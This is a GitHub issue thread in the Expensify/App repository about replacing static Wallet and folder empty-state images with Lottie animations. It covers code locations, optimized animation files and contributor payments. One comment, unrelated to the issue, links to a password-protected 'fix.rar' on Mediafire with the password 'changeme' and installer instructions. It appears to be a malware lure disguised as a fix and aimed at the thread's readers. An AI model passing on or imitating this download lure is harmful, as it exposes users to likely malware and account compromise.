### ISSUE TITLE
[Awaiting Payment] [$250] Update Wallet and Generic Folder empty state to use lottie animations

### ISSUE THREAD

**Issue by shawnborton** [Expensify/App#48013]
We have some empty states in our product that are currently static, and we want to update them to have looping Lottie animations. 

The first place is the Wallet empty state:
![CleanShot 2024-08-26 at 11 55 25@2x](https://github.com/user-attachments/assets/8d371011-4f69-41f2-8f0c-3ff6fe673adb)

And the other place is anywhere we show the folder empty state, like Search or Workspaces > Tags, Workspaces > Report fields, etc:
![CleanShot 2024-08-26 at 11 58 43@2x](https://github.com/user-attachments/assets/139a1c47-9692-4af2-9750-14fd16459a42)

Here are the lottie files needed:
- Wallet: [SettingsWallet-082324-1.json.zip](https://github.com/user-attachments/files/16750923/SettingsWallet-082324-1.json.zip)
- Folder: [GenericEmptyState-082324-1.json.zip](https://github.com/user-attachments/files/16750927/GenericEmptyState-082324-1.json.zip)

![SettingsWallet-082324-1](https://github.com/user-attachments/assets/c4fdabae-e954-41b0-ab5e-1006b92e837c)

![GenericEmptyState-082324-1](https://github.com/user-attachments/assets/a73accad-6362-4815-ade0-fff6acac60be)

cc @roryabraham @Expensify/design @luacmartins for visibility

@trjExpensify - I wonder if this is considered #wave-control polish or something? 
<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~0164ffd5b6f9684066</li>
        <li>Upwork Job ID: 1828144309254029734</li>
        <li>Last Price Increase: 2024-08-26</li>
<li>Automatic offers: </li>
<ul>
<li>Krishna2323 | Contributor | 103690909</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @anmurali</details>

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by roryabraham** [comment]
@Krishna2323 I think you missed a few spots where this change is needed, such as [here](https://github.com/Expensify/App/blob/91e492c847b5429d8537c3c364e786815353e8ef/src/pages/workspace/tags/WorkspaceTagsPage.tsx#L362). Please enumerate all the locations in the app where `Illustrations.EmptyState` is used.

**Comment by roryabraham** [comment]
@shawnborton that illustration ^ is called `Illustrations.EmptyStateExpenses`. It's very similar to `Illustrations.EmptyState` - I think the only difference is that the receipts poking out are purple instead of blue. Can you confirm if we also should replace this with the animated alternative?

**Comment by shawnborton** [comment]
Oh interesting, that particular page should be using the same empty state as Search & Tags, not sure why it doesn't.

The one I was referencing was this: 
![CleanShot 2024-08-26 at 14 55 25@2x](https://github.com/user-attachments/assets/409c0642-66b1-496e-9f54-8a5c4e10390e)

**Comment by shawnborton** [comment]
> Can you confirm if we also should replace this with the animated alternative?

Yes, but I think the whole view should be replaced with the new empty state style that we see everywhere else. I think it was missed when we updated the empty state views for Search, Tags, etc.

**Comment by roryabraham** [comment]
Optimized `.lottie` versions of the new animations (let's use these instead of the `.json` ones): 
[OptimizedAnimations.zip](https://github.com/user-attachments/files/16752709/OptimizedAnimations.zip)

**Comment by hungvu193** [comment]
@trjExpensify this one is ready for payment 😄

**Comment by anmurali** [comment]
paid @Krishna2323 
@hungvu193 sent you an [offer](https://www.upwork.com/nx/wm/offer/104332284)

**Comment by hungvu193** [comment]
Thanks. I've just accepted!

**Comment by anmurali** [comment]
Paid.
